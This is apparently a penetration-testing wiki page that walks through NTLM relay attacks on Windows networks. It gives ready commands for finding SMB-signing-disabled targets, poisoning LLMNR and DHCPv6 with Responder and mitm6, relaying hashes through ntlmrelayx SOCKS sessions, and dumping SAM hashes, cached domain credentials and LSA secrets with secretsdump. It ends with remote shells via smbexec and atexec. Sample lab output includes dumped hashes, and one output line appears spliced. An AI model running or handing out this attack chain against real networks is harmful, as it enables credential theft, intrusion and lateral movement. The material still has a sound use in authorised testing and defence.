SMB Relay
This page deals with gaining code execution relaying NTLMv1/2 hashes in a very effective manner.

Introduction

When capturing a NTLMv1/2 hashes with tools like Responder, attackers have two options:
  • crack it to retrieve cleartext passwords
  • relay it to gain code execution on a target
The relayed user must have privilege on the target.

Valid targets

In order to relay hashes, we must have valid targets. Valid targets are machines with SMB Signing disabled.
SMB Signing is disabled by default on every Windows OS, except Windows Server.
To create a list file of valid targets, use CrackMapExec:
1
cme smb <networkIP>/<cidr> --gen-relay-list relayTargets.txt
Copied!

Capture hashes

To capture NTLMv2 hashes, simply use Responder. Before running it, edit the Responder.conf:
1
[Responder Core]
2
3
; Servers to start
4
SQL = On
5
SMB = Off # Turn this off
6
Kerberos = On
7
FTP = On
8
POP = On
9
SMTP = On
10
IMAP = On
11
HTTP = Off # Turn this off
12
HTTPS = On
13
DNS = On
14
LDAP = On
Copied!
Then fire up Responder:
1
python Responder.py -I <interface> -r -d -w
Copied!

Relaying hashes

Instead of cracking Responder hashes, we can relay it to our valid targets to gain code execution on it. For that purpose, you can use Responder's MultiRelay or Impacket's ntlmrelayx.
With ntlmrelayx, you can use and reuse sessions instead of executing a one-shot attack.
One-Shot Attack vs Socks Support.
To use SOCKS support, simply use -sock switch:
1
./ntlmrelayx.py -tf relayTargets.txt -socks -smb2support
Copied!
Since MS08-068, it is impossible to relay a hash back to the machine it comes from (reflective attack).

Abusing IPv6

Until now, we have abused LLMNR protocol to capture NTLMv2 hashes. It works great, but we can increase the effectiveness of hash relaying by abusing IPv6 protocol too.
The idea is to reply to DHCPv6 requests made by machines on the network to set the attacker IP as the default IPv6 DNS server in order to force victims to authenticate against our attacker machine because of the IPv6 priority over IPv4 in Windows.
Abusing IPv6 protocol with mitm6.
To use mitm6:
1
sudo mitm6 -d <domain>
Copied!
To minimize the impact on the network, the lease will expire within 5 minutes when mitm6 is stopped, which will remove the DNS server from the victims configuration.

What to do with sessions?

Many sessions will be established by chaining these exploits:
1
ntlmrelayx> socks
2
Protocol Target Username Port
3
-------- -------------- ------------------------ ----
4
SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445
5
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
6
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
7
SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445
8
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
9
SMTP 192.168.48.224 VULNERABLE/NORMALUSER3 25
10
SMTP 192.168.48.224 CONTOSO/NORMALUSER1 25
11
IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143
12
...
Copied!
To interact with these sessions, you need to edit /etc/proxychains.conf:
1
[ProxyList]
2
socks4 <yourIP> 1080
Copied!

Retrieving local hashes

Then you can retrieve targets local hashes with Impacket's secretsdump:
You can type anything when you are prompted for a password.
1
[email protected] # proxychains ./secretsdump.py vulnerable/[email protected]
2
ProxyChains-3.1 (http://proxychains.sf.net)
3
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
4
5
Password:
6
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
7
[*] Service RemoteRegistry is in stopped state
8
[*] Starting service RemoteRegistry
9
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
10
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
11
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
12
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
13
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
14
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
15
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
16
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
17
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
18
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
19
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
20
[*] Dumping LSA Secrets
21
[*] $MACHINE.ACC
22
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
23
[*] DPAPI_SYSTEM
24
0000 01 00 00 00 1C 17 F6 05 23 2B E5 97 95 E0 E4 DF ........#+......
25
0010 47 96 CC 79 1A C2 6E 14 44 A3 C1 9E 6D 7C 93 F3 G..y..n.D...m|..
26
0020 9A EC C6 8A 49 79 20 9D B5 FB 26 79 ....Iy ...&y
27
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
28
[*] NL$KM
29
0000 EB 5C 93 44 7B 08 65 27 9A D8 36 75 09 A9 CF B3 .\.D{.e'..6u....
30
0010 4F AF EC DF 61 63 93 E5 20 C5 4F EF 3C 65 FD 8C O...ac.. .O.-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Copied!

Getting code execution

You also can obtain a shell with Impacket's smbexec and atexec:
1
proxychains smbexec.py <domain>/<relayedUser>@192.168.10.60
Copied!
1
proxychains atexec.py <domain>/<relayedUser>@192.168.10.60 "<cmd>"
Copied!
psexec or wmiexec do not work here (see references).

Using SMBClient

You can use SMBClient:
1
[email protected]:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator
2
ProxyChains-3.1 (http://proxychains.sf.net)
3
WARNING: The "syslog" option is deprecated
4
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
5
Enter VULNERABLE\Administrator's password:
6
Try "help" to get a list of possible commands.
7
smb: \> dir
8
$Recycle.Bin DHS 0 Thu Dec 7 19:08:00 2017
9
Documents and Settings DHS 0 Tue Jul 14 01:08:10 2009
10
pagefile.sys AHS 1073741824 Thu May 3 16:32:43 2018
11
PerfLogs D 0 Mon Jul 13 23:20:08 2009
12
Program Files DR 0 Fri Dec 1 17:16:28 2017
13
Program Files (x86) DR 0 Fri Dec 1 17:03:57 2017
14
ProgramData DH 0 Tue Feb 27 15:02:13 2018
15
Recovery DHS 0 Wed Sep 30 18:00:31 2015
16
System Volume Information DHS 0 Wed Jun 6 12:24:46 2018
17
tmp D 0 Sun Mar 25 09:49:15 2018
18
Users DR 0 Thu Dec 7 19:07:54 2017
19
Windows D 0 Tue Feb 27 16:25:59 2018
20
21
5216767 blocks of size 4096. 609996 blocks available
22
smb: \>
Copied!
Many other protocols can be relayed: imap, ldap, mssql, etc (see references).

References